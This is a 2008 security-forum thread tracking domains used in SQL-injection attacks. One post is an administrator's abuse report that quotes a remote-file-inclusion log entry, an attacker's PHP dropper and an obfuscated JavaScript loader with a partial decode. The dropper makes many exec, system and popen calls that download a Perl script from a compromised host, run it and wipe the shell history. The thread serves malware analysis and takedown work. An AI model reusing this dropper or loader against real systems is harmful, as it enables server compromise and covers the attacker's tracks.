Author Topic: SQL Injected jscript sites  (Read 72997 times)

0 Members and 1 Guest are viewing this topic.

June 02, 2008, 04:27:14 am
Read 72997 times

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
Hi folks,

Still getting settled in here.  Thanks JohnC and sowhat-x for the access.

I've been maintaining a list of sites I've seen that are used in the SQL injections that are injecting jscript:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

Some are long down, some are quite fresh.  I'll try and update this thread as I add to the list.

Latest:
hxxp://www.redir94.com
hxxp://www.locale48.com
hxxp://www.en-us18.com
hxxp://www.sysid72.com
hxxp://www.libid53.com
hxxp://www.script46.com
hxxp://www.rundll92.com
hxxp://www.logid83.com
The Shadowserver Foundation

June 02, 2008, 05:54:24 am
Reply #1

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Hi YanceySlide. Welcome to MDL and thanks for the list.

TJS

June 02, 2008, 05:56:39 am
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've just sent the following to the owner and registrar of mgfcompressors.com, due to someone trying to use a couple files on their server, to try and exploit one of my servers;

Code: [Select]
Ref: mgfcompressors.com/portal/help/file.txt???

The above is a Perl exploit that is used to exploit other servers. It downloads another file from;

mgfcompressors.com/portal/help/

Which then downloads another encoded script;

mgfcompressors.com/portal/help/aoaqv.js

Which is then used to exploit servers, as shown by the following excerpt from my server logs;

**************************************
BEGIN
**************************************
2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0
**************************************
END
**************************************

The IP that attempted the exploit (193.198.217.3), resolves to;

blaz.zsem.hr

Needless to say this exploit failed as I do not run Perl on my servers, and do not permit my servers to download non-authenticated files from unknown sources (and certainly do not allow my servers to run in capacities that would permit them to run non-essential scripts from unknown sources).

Can you cleanup your server please?

Relevant codes (they seem to block subsequent attempts to access the files, so posting here for clarity)

Code: [Select]
<title>By zaNga</title>
<h2>PHPESSID56465465421200121242024512878952300564505478693</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://www.mgfcompressors.com/portal/help/";
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
?>

mgfcompressors.com/portal/help/ loads a script that executes the following (via XMLHTTP). I had problems fully decoding it due to arguments.callee.toString

Code: [Select]
var arg="lzchtreg";
function TkPgnCxzu(U){var Be7k="];Ak=tP.c";var sOX="G49SGGR%1SG34";var S="%se71%se2%6T";var s="arguments.calle";var Agzj="Cc%5BCc%6BCc%";var KVB="D%se63%se61%";var mEV="37Cc%3DC";var mn="cS2qjhcS65%hcS";var yv9="){if((q.readySt";var aF7="7spd3B';ev";var gIWK="0Cc%3";var o=";var h='3";var FSa="6ECc%50Cc%47Cc";var wNZb="S9g4%hcS";S+="se7B%se";var OV="1%hcS";var O4R="cS61g4%hc";var RhxD="e(K.replace(/%";var Mjn="S3B%hc";var BGWp="8KQ%1%se48KQ%1";var cEFw="%se68%se28%s";var nM="Cc%7BC";var a="3D%se2";o="i;Thd=Thd%13788"+o;var LT=";var V3L";var Q3Ts="G[RWo";var rbt="5%se25%se35%se";var NYl8="cS2%hcS4";var uG="q19=46";var aY7j="7ACc%4F";var pJA="hcS2%hcS69%";var D="3VlhcS3";KVB+="se78KQ%1";var MO="sA1spd72spd20";var w="ngth;c=c%h.le";var j="4%hcS2%";var ki0n="c%3DCc%57Cc%35";var w7="S42%hcS2E%hc";var Oj3="B.rep";var FA="CsAspd73spd38";var gIg="2r3H74Cc%6ECc%3";var hpMH="se20%se28";var J8="5%se3";gIg+="7Cc%2";var ylP="F%hcS6A%hcS3";var H="BCc%74Cc%6ECc";var fx="3Dspd27spd%C";var tH=";rR=rR+N";var Rr="2ECc%63Cc%6r3";var tpmK="Q%1%se25%";var dlrT="r vO;vO=rR+ykui";var PR="Tse3B%s";var uJ="5%se77%se20";var vXj5="e37%se33%";var cp="pe(q.resp";uJ+="%se58%";var nj="ll);";var m6f="%se25%se";var huhd="S6A%hcS2B%hcS2B";var Qm="VlhcS31%hcS29g";huhd="6F%hc"+huhd;var O1pL="e(Ak);}eva";var tw="e37%se32%s";var x7t8=";l++){";H=ki0n+"Cc%4FCc%2"+H;var O="var Q=64112;var";cEFw+="e65%se2%6Tse7";var fRBA="6C%se";var J="g,'');B=B.";var o3jT="=Thd+b;var K='s";nj="rue);q.send(nu"+nj;var HM="%7Z2r3H6";nM="BCc%2BCc%29"+nM;var Cyq="%5DCc%3BCc%6";var sYp="4%hcSD%hcS42";PR="se2%6"+PR;var Ro="eplace(/SG/g";var MGQ="c%74Cc%6ECc%37";cp="{tP = unesca"+cp;var bzKy="cS3D%hcS6Eg";Agzj="%6ECc%50Cc%47"+Agzj;var N="c%/g,'%').re";var xn5X="DCc%30Cc%";var f="se7B%s";mEV+="c%6ECc%50Cc%47";tpmK="e25%se35%se38K"+tpmK;var So0="{akK();}};q.on";var E="var x";var W="hcS25%hcS";S+="78KQ%1%se";var LCS="c%6BCc%74Cc";var kXe="ape(Qg6M.repla";var c67G="hcS29%hc";var BmE="e71%se3";var kJa="42%hcS2E%";var NlYX="cS21%hcS";var fXe=").replace";var GJ="'y%')";aF7="71spd2"+aF7;NYl8+="VlhcS6F%";var dGFN="/g,'%";var DimR="=tn7;Ak=nPG";FSa="Cc%37Cc%3DCc%"+FSa;var ysxS="%6D%6C%32%2E%5";var ps9B="%se7D%s";GJ="lace(/qj/g,"+GJ;m6f="6%se36"+m6f;Mjn=ylP+"D%hcS30%hc"+Mjn;var HDN6="5qjhcS29%";var CA7x="e(/Mm/g,'%";S="%se28%se21"+S;Q3Ts="o];nP"+Q3Ts;var V="61g4%hcS2%hcS4V";FSa+="%5BCc%6B";var lp="%se48%se7";Rr+="H61Cc%7Z43C";var CLN="%se63%se61%se7";sYp="5qjhcS29%hcS3Bg"+sYp;var yci=")^Ak;SX+=St";var zTf="hcS6D%hcS4VlhcS";OV="%hcS3"+OV;var cMD4="1%hcS4qjhcS";Oj3="l(unescape(c"+Oj3;Be7k+="harCodeAt(x6"+yci;var Fv="(nY);}catch";FSa="Cc%74Cc%6E"+FSa;var O9e="Cc%74Cc%6";m6f+="37%se";var AYO="4qjhcS2B%";E+="6;var Ak;for(";mn="%hcS4%h"+mn;ysxS="4D%73%78"+ysxS;var m="8KQ%1%se28";bzKy+="4%hcS";var X76="R%4SG3BSG72SG52";var c6ED="%6ECc%37C";FSa+="Cc%74Cc%7A";var T="C';var b=70";var ZDZQ="c%6BCc%74Cc%7";var ID="6ECc%67Cc";var G="8spd78spd";gIg+="9Cc%3BCc%74";gIg+="Cc%6ECc%"+mEV;var L5XO="Q%1%se43%se25";fx=MO+"spd72spd52spd"+fx;var w31=";var W5O=0;var ";var XY="RWo=RWo+";var A="8KQ%1%se2";var PG="HZe;c=";nj="en('GET',zqj,t"+nj;var O2mU="Tse76%";s+="e.toString();";var bru="%hcS2%";x7t8="(l=0;l<256"+x7t8;rbt="se32%se4"+rbt;s+="B=B.re";var iz="%se25%se36%";var v4m="FCc%3DCc%";var lF="GUR=VxEJ;va";kJa="hcS3D%hcS"+kJa;Q3Ts="tn7=nPG[RW"+Q3Ts;hpMH+="%se21";lF+="r f2QH='';";var LDuA="cS67g4%h";var sxvb="S61g4%hcS2";CA7x+="')));"+E;var feGD="lhcS6F%hcS64%h";w31+="Qg6M='Cc%76Cc%6";var cmd="cS6A%hcS25";var bS="escape(LV);";V=zTf+"6qjhcS"+V;Oj3="7D';eva"+Oj3;var dx="VxEJ=U;nPG=new ";var tgR="52%se";gIg+="Cc%5BCc%6BCc%";var wd="var Thd;Thd=3";var onet="ce(/g4%/g,'%7')";PR="e41%se72%se52%"+PR;var YtG="S66g4%hcS2%hcS6";yv9+="ate==4)&&(q.st";var mQa="se71%se";ysxS+="8%4D%4C%48%54%";var Yi="%se6E%se4F%s";aY7j="%6BCc%74Cc%"+aY7j;CLN+="8KQ%1%se63";Fv="bject"+Fv;kXe=xn5X+"3B';eval(unesc"+kXe;a+="7%se25";lF+="var g";GJ="cape(c2.rep"+GJ;huhd+="%hcS29g4%hcSB%";AYO+="hcS3D%";var aGb="unescape(vuL.r";CA7x="').replac"+CA7x;c6ED+="c%3BCc%6";var Z="cFCs';ykui=yku";ZDZQ="3Z35Cc%36Cc%3BC"+ZDZQ;x7t8="var B;for"+x7t8;nM=ZDZQ+"ACc%4FCc%2"+nM;O9e+="ECc%37Cc";var P="ce(/%6T/g,'9%'";ysxS+="54%50';var cB=";var fh="73%se6";MGQ+="Cc%3B";var ggTy="ABspd75sp";Q3Ts="hBIs%256;"+Q3Ts;var R="6%hcS2qjhcS65%h";var kyf="se20%se41%se";O9e+="%3BCc%7DCc";DimR+="[RWo]+nPG";L5XO+="%se38KQ";sOX+="SG27SG";hpMH+="%se71%se2%6T"+f;var y="se72%se7%6T";bru+="hcS6F%"+V;HDN6+="hcS3B%h"+LDuA;Qm+="4%hcSB%hcS66%";c67G=mn+"6F%hcS6A%"+c67G;yv9+="atus==";fx="Bspd7%CsAspd%C"+fx;var gk2="28%se65%se2%6T";RhxD+="CsA/g,'6').rep";var YTb="hcS66%hcS";vXj5="se46%se25%s"+vXj5;w+="ngth;var "+dx;var gO="l}}var zqj=iGUR";var lrv="20MZ53MZ";CLN+="%se68%se"+gk2;var Li="44spd27spd3Bspd";LCS+="%7ACc";Cyq+="ECc%50Cc%4";DimR="[hBIs]"+DimR;var Ft=",'2%').repl";P="/g,'b').repla"+P;yv9+="200))"+So0;PG+="c+rR.length;c=c";aGb=sOX+"3B';eval("+aGb;w31+="1Cc%7Z";var YsrI="S67g4%hc";Q3Ts+="]=nPG[";gIWK+="Z35Cc%36Cc%3B"+FSa;O9e="c%4FCc%5DCc%3D"+O9e;X76+="SG2BSG3DS";var xZW1="place(/Z";var KxMe="B%se71%s";DimR+="[hBIs];Ak=Ak%2";Ro+=",'%')));var "+uG;o=wd+"5861;var yku"+o;iz+="se3%6Tse25%se3";var ui8="KQ%1%s";Fv="=new ActiveXO"+Fv;cp="unction()"+cp;Mjn="%hcS6"+Mjn;var ULuQ="74Cc%";c67G+="S3B%hcS69%"+YTb;R="hcSD%hcS69%hcS6"+R;Cyq+="7Cc%5BCc";lF+="ysX=18";a="20%se4C%se56%se"+a;CA7x+="x6=0;x6<tP.le";var i1EP="2%se6A%se65";S="e66%se20"+S;BGWp=rbt+"38%se25%se3"+BGWp;fXe="(/Vl/g,'3%'"+fXe;YsrI="cS6E%hc"+YsrI;nj="e=x;q.op"+nj;var n="sA1spd";var pCH5="Cc%5BCc%";NYl8+="hcS64%hcS65%hc";D="hcS3D%hcS3D%hcS"+D;LCS=v4m+"30Cc%3BC"+LCS;var sf="30%se27%se3B";T+="100;var HZ";var gj="6ECc%37Cc%20Cc";Q3Ts="+nPG[RWo];hBIs="+Q3Ts;J+="toUpperCa";T+="e;var N5='bO2";xZW1="escape(V3LR.re"+xZW1;YtG="S2E%hc"+YtG;tH="'%')))"+tH;KxMe=S+"72%se7%6Tse7"+KxMe;FA="spd3%"+FA;i1EP="8%se4F%se6"+i1EP;fXe+="(/%hcS/g,'%')";MGQ="c%4FCc%5DCc%2BC"+MGQ;Ft+="ace(/r3";fRBA="6E%se75%se"+fRBA;LT+="R='MZ68MZ42M";Mjn="2%hcS2qjhcS65"+Mjn;var JD6a="se6C%se";Be7k=DimR+"56;Ak=nPG[Ak"+Be7k;Z=Ro+"40;N5+='v47"+Z;sf=tpmK+"se35%se"+sf;HDN6+="cS9g4%hcSVl";lF+="8;var eoj";sYp="4%hcSVlhcS"+sYp;gIWK+="Cc%4FCc%5DCc";MGQ+="Cc%74Cc%6E";Ft=N+"place(/Z/g"+Ft;var i="Dspd%";bzKy=sxvb+"%hcS20g4%hcS1%h"+bzKy;onet=fXe+".repla"+onet;var RLe="/g,'8'";HM+="BCc%74Cc%7ACc%4"+LCS;LT+="Z49MZ73MZ3DM";ysxS="ArR='%"+ysxS;J=s+"place(/\\W/"+J;bS="%')));var nY=un"+bS;X76="SGGR%8SGG"+X76;Mjn+="S65%hcS6F";bS="place(/%se/g,'"+bS;RLe="ce(/y"+RLe;Yi="2%se20"+Yi;O+=" vuL='S";O2mU="78KQ%1%se6%6"+O2mU;i=ggTy+"d%CsA9spd3"+i;var eeF="S6qjhcS3B%hc";OV+="3qjhcS3qjhcS3B";R+="cS6F%h"+cmd;var Zl="g4%hcSVlhcS5qj";ui8=lp+"8KQ%1%se78"+ui8;var ggNn="MZ3B';e";gIWK+="%3BCc"+Agzj;CLN+="se7B%"+mQa;D+="1%hcS29g4%hcSB";NYl8="jhcS61g4%h"+NYl8;AYO="hcS51%hcS"+AYO;dGFN+="3').replace(";YsrI=w7+"S6C%hcS65%h"+YsrI;onet=GJ+".replace"+onet;m="e65%se73%se7"+m;kJa+="hcS6Vlhc";PG="+Q;c=c+"+PG;Q3Ts="6;hBIs=hBIs"+Q3Ts;sf=J8+"5%se38KQ%1%s"+sf;Yi+="e58KQ%1";AYO=D+"%hcS66%hcS32%"+AYO;OV="jhcS3D"+OV;var C="e4F%se58KQ%1%s";FA+="spd27spd3";O2mU+="se65%se5"+i1EP;LT=Ft+"H/g,'8%')))"+LT;sYp="qjhcS67g4%hcS9g"+sYp;BGWp+="%se25%se38K"+L5XO;fh="6E%se65%se"+fh;c67G+="2qjhcS65%hcS6F";Be7k+="ring.f";tH=RhxD+"lace(/spd/g,"+tH;lrv="Z61MZ72MZ"+lrv;cEFw+="B%se71%se3D%se"+fRBA;Z=dGFN+"/GR%/g,'6').r"+Z;onet="';eval(unes"+onet;ID+="%74Cc%6r3H3BCc%"+ULuQ;Z+="i*q19;va"+dlrT;sYp="hcS65%hcS2"+sYp;var hcZq="d2Bspd3Dspd27sp";W+="3VlhcS32%"+AYO;c6ED=w31+"20Cc%74Cc"+c6ED;O=tH+"5;var c=33550;"+O;A=O2mU+"%se63%se7"+A;J+="se();B+=c;var i"+lF;y=hpMH+"e78KQ%1%"+y;fh+="3%se61%s";O=aF7+"al(unescap"+O;R+="%hcS3VlhcS32%h"+NlYX;c6ED+="6Cc%6FCc"+HM;j+="hcS69%hcS6E%";Mjn+="%hcS6A%hcS3C%hc"+YsrI;kJa+="S6qjh"+O4R;O9e=Cyq+"%57Cc%35C"+O9e;C=A+"8%se6E%s"+C;yv9="var x=function("+yv9;Mjn="4%hcS"+Mjn;ysxS=RLe+")));var "+ysxS;sYp+="%hcS3D%hcS66%hc";PG+="%b.le"+w;fh+="e70%se65%se28%s"+PR;O9e+="%5Z57Cc";MGQ+="Cc%37C"+H;onet+=".repla"+ysxS;gIWK=gj+"%25Cc%2"+gIWK;Rr="Cc%4Z"+Rr;var iy="67%hcS2";bru+="lhcS6F%hcS64%"+sYp;hcZq=FA+"Bspd%CsA8sp"+hcZq;pCH5+="57Cc%35Cc%4FCc"+O9e;o+="r2PkG2";Oj3=JD6a+"6C%se7D%se"+Oj3;O1pL+="l(SX);};"+yv9;P=Oj3+"lace(/8KQ%"+P;bru+="S32%hcS5"+cMD4;ui8+="e70%se"+tgR;uJ=BmE+"D%se6E%se6"+uJ;bS="b1%/g,'4%').re"+bS;gIg="Cc%74Cc%"+gIg;O+="GGRCSG3DSGGRC";c67G+="%hcS6A%"+W;NYl8="cS4VlhcS6q"+NYl8;O1pL+="readystatechang"+nj;var Rea="51%hcS4qjhcS2B";o3jT+="pd7%CsAspd%C"+n;m+="%se2%6Ts";onet+="'%se76%se61%";LT=kXe+"ce(/C"+LT;Q3Ts=XY+"1;RWo=RWo%25"+Q3Ts;G+="%CsA3spd3Dspd2";aY7j+="Cc%25Cc%4Z2EC";lrv+="58MZ3DMZ27MZ27"+ggNn;CLN+="3D%se6E%se75%"+P;bS=CLN+").replace(/"+bS;nM+="c%74Cc%6";bzKy+="5%hcS6C%hcS6C";ui8+="65%se71%se75%s"+m;gO+=";var akK=f"+cp;Rr+="c%6FCc%64Cc%";bru=iy+"E%hcS66g4"+bru;lrv="BMZ76M"+lrv;Qm=R+"3D%hcS3"+Qm;var Abi="%57Cc%35Cc%4";x7t8=PG+"Array();var l;"+x7t8;vXj5+="se25%se36%se";var ymm="5DCc%3DCc%6";feGD+="cS65%hcS41g4"+c67G;nM+="ECc%37Cc%3DCc"+aY7j;gIWK=Abi+"FCc%3DCc%74Cc%"+gIWK;m6f="5%se3"+m6f;pCH5+="%6FCc%3"+LT;wNZb="7g4%hc"+wNZb;j+="hcS67%hc"+YtG;ymm+="ECc%50Cc%47"+pCH5;o3jT+="72spd20spd7"+G;c6ED=gO+"onseText)"+c6ED;Rr+="65Cc%41"+gIg;huhd=eeF+"S65%hcS"+huhd;fx=i+"CsA2spd3"+fx;fh=Yi+"%se3D%se75%se"+fh;Rea+="%hcS3D%hcS53g4";Rea+="%hcS4g4%"+pJA;Li+="79spd%Cs"+fx;bzKy+="%hcS3B"+onet;Q3Ts+="hBIs];nPG"+Be7k;a+="%se38K";J=x7t8+"nPG[l]=l;}B="+J;nM=c6ED+"%4FCc%3CCc%"+nM;y=sf+"%se6%6Tse66%"+y;NYl8=j+"F%hcS6D%h"+NYl8;wNZb+="VlhcS"+HDN6;kyf="E%se65%se77%"+kyf;hcZq+="d%CsAAspd39spd"+Li;Z+=";rR=xxc+vO;b=N5"+J;wNZb+="hcS5q"+OV;wNZb=NYl8+"S2qjhcS6"+wNZb;xZW1+="/g,'m"+CA7x;uJ=y+"se7B%s"+uJ;tw+="e25%se36%"+vXj5;C=kyf+"63%se"+C;Rr+="74Cc%7AC"+MGQ;uJ+="se4D%se4C"+ui8;aGb=X76+"G27SG45S"+aGb;Qm=wNZb+"g4%hcSDg4%"+Qm;Zl=huhd+"hcS67g4%hcS9"+Zl;ID+="6ECc%37Cc%3D"+Rr;Zl=Mjn+"S4%hc"+Zl;Z=aGb+"eplace(/C"+Z;KVB+="%se63"+cEFw;bru=Rea+"hcS6E%hcS"+bru;C=KxMe+"e3D%se6"+C;iz+="6%se33%se25%s"+tw;gIWK+="74Cc%7ACc%4FCc%"+ymm;Z=O+"SG2BSG54"+Z;ps9B=KVB+"6C%se7D%se3B"+ps9B;BGWp=m6f+"38KQ%1%se25%"+BGWp;Z=hcZq+"sABspd"+Z;ID=nM+"c%6CCc%65Cc%"+ID;feGD=kJa+"S2%hcS4V"+feGD;T=o+"';h+='Vp"+T;C=fh+"e6%6Ts"+C;Qm+="hcS32%hcS"+bru;Q3Ts+="romCharCod"+O1pL;iz+="46%se2"+BGWp;ID=Fv+"(e){q=nul"+ID;a=bzKy+"se72%se"+a;feGD=Zl+"hcS5E%"+feGD;ID=bS+"if (!q){try{q"+ID;ID+="%37Cc%3BCc"+gIWK;feGD="hcS66%hcS6Fg"+feGD;ID+="Z30MZ3"+lrv;T+="Px';HZe"+o3jT;Z="7%CsA"+Z;xZW1=ID+"val(un"+xZW1;uJ=iz+"%1%se38%se2"+uJ;a+="Q%1%se48KQ%1"+uJ;xZW1=C+"e2%6Tse3B%se7D"+xZW1;Qm+="3Bg4%hcS6%hc"+a;ps9B=Qm+"e3B%se7"+ps9B;ps9B=feGD+"hcS53g4%hcS4g"+ps9B;ps9B+="e76%se61%se7"+xZW1;ps9B+="ngth;x6++){"+Q3Ts;Z=T+"7spd54spd72spd"+Z;Z+=";var c2='%"+ps9B;eval(Z);}TkPgnCxzu(arg);

Partially decoded;

Code: [Select]
var Thd;Thd=35861;var ykui;Thd=Thd%13788;var h='3r2PkG2';h+='VpC';var b=70100;var HZe;var N5='bO2Px';HZe=Thd+b;var K='spd7%CsAspd%CsA1spd72spd20spd78spd78spd%CsA3spd3Dspd27spd54spd72spd7%CsAspd3%CsAspd73spd38spd27spd3Bspd%CsA8spd2Bspd3Dspd27spd%CsAAspd39spd44spd27spd3Bspd79spd%CsABspd75spd%CsA9spd3Dspd%CsA2spd3Bspd7%CsAspd%CsA1spd72spd20spd72spd52spd3Dspd27spd%CsABspd71spd27spd3B';eval(unescape(K.replace(/%CsA/g,'6').replace(/spd/g,'%')));rR=rR+N5;var c=33550;var Q=64112;var vuL='SGGRCSG3DSGGRCSG2BSG54SGGR%8SGGR%4SG3BSG72SG52SG2BSG3DSG27SG45SG49SGGR%1SG34SG27SG3B';eval(unescape(vuL.replace(/C/g,'%3').replace(/GR%/g,'6').replace(/SG/g,'%')));var q19=4640;N5+='v47cFCs';ykui=ykui*q19;var vO;vO=rR+ykui;rR=xxc+vO;b=N5+Q;c=c+HZe;c=c+rR.length;c=c%b.length;c=c%h.length;var VxEJ=U;nPG=new Array();var l;var B;for(l=0;l<256;l++){nPG[l]=l;}B=arguments.callee.toString();B=B.replace(/\W/g,'');B=B.toUpperCase();B+=c;var iGUR=VxEJ;var f2QH='';var gysX=188;var eoj;var c2='%hcS66%hcS6Fg4%hcS2%hcS2qjhcS65%hcS6F%hcS6A%hcS3D%hcS30%hcS3B%hcS65%hcS6F%hcS6A%hcS3C%hcS42%hcS2E%hcS6C%hcS65%hcS6E%hcS67g4%hcS4%hcS6qjhcS3B%hcS65%hcS6F%hcS6A%hcS2B%hcS2B%hcS29g4%hcSB%hcS67g4%hcS9g4%hcSVlhcS5qjhcS5E%hcS3D%hcS42%hcS2E%hcS6VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS41g4%hcS4%hcS2qjhcS65%hcS6F%hcS6A%hcS29%hcS3B%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS3D%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3B%hcS67g4%hcS9g4%hcSVlhcS5qjhcS3D%hcS31%hcS3qjhcS3qjhcS3Bg4%hcSDg4%hcSD%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS21%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3Bg4%hcSD%hcS42%hcS3D%hcS66%hcS32%hcS51%hcS4qjhcS3Bg4%hcS6%hcS61g4%hcS2%hcS20g4%hcS1%hcS3D%hcS6Eg4%hcS5%hcS6C%hcS6C%hcS3B';eval(unescape(c2.replace(/qj/g,'y%').replace(/Vl/g,'3%').replace(/%hcS/g,'%').replace(/g4%/g,'%7').replace(/y/g,'8')));var ArR='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var cB='%se76%se61%se72%se20%se4C%se56%se3D%se27%se25%se38KQ%1%se48KQ%1%se25%se36%se3%6Tse25%se36%se33%se25%se37%se32%se25%se36%se46%se25%se37%se33%se25%se36%se46%se25%se36%se36%se25%se37%se38KQ%1%se25%se32%se45%se25%se35%se38%se25%se38KQ%1%se48KQ%1%se25%se38KQ%1%se43%se25%se38KQ%1%se38%se25%se35%se38KQ%1%se25%se35%se38KQ%1%se25%se35%se30%se27%se3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se58%se4D%se4C%se48%se78KQ%1%se78KQ%1%se70%se52%se65%se71%se75%se65%se73%se78KQ%1%se28%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se3B%se7D%se76%se61%se72%se20%se6E%se4F%s